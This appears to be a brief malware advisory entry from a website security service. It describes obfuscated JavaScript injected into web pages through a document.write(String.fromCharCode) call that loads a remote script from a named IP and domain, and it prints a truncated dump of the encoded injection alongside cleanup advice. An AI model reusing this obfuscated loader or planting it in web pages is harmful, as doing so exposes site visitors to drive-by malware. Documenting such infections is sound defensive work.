Description:
Malware identified and encoded inside a "document.write(String.fromCharCode" call. It is used to call an external and malicious javascript file, while making it hard to find.
Loads malware from (85.17.155.86):
captivejfu.co.cc
Affecting:
Any type of web site (no specific target).
Clean up and details:
Remove offending line from the javascript file.
Malware dump:
document.write(String.fromCharCode("=tdsjqu!uzqf>#ufyu0kbwbtdsjqu...